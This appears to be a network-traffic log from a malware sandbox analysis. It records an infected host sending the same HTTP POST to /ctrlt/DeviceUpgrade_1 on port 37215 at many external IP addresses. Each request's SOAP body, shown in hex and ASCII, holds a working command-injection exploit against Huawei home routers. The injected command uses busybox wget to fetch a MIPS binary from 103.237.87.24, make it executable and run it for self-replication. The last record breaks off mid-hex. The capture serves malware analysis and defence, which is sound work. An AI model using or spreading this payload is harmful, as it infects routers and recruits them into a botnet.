                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  72192.168.2.1342728160.17.77.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061340094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  73192.168.2.135243241.130.226.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061402082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  74192.168.2.1339564197.30.3.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061405897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  75192.168.2.1357118157.177.255.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061444998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  76192.168.2.1345354157.78.103.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061444998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  77192.168.2.1339054136.246.59.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061444998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  78192.168.2.135740641.199.7.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061476946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  79192.168.2.1356824177.72.183.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061476946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  80192.168.2.133293041.185.115.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061476946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  81192.168.2.1353642197.171.167.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061484098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 